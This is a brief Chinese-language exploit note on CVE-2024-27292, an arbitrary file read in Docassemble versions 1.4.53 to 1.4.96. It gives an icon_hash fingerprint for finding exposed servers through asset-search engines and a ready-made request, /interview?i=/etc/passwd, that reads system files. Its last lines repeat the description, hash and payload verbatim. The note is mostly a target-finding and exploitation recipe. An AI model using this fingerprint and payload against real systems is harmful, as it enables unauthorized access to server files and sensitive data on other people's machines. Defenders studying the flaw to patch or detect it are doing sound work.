Docassemble interview存在任意文件读取漏洞(CVE-2024-27292)
一、漏洞简介
Docassemble是一个指导面试和文件汇编的专家系统。Docassemble interview存在任意文件读取漏洞(CVE-2024-27292)该漏洞允许攻击者通过URL操纵获得对系统信息的未经授权访问。
二、影响版本
- 影响版本1.4.53到1.4.96
三、资产测绘
icon_hash="-575790689"
四、漏洞复现
/interview?i=/etc/passwd
Docassemble是一个指导面试和文件汇编的专家系统。Docassemble interview存在任意文件读取漏洞(CVE-2024-27292)该漏洞允许攻击者通过URL操纵获得对系统信息的未经授权访问。
icon_hash="-575790689"
/interview?i=/etc/passwd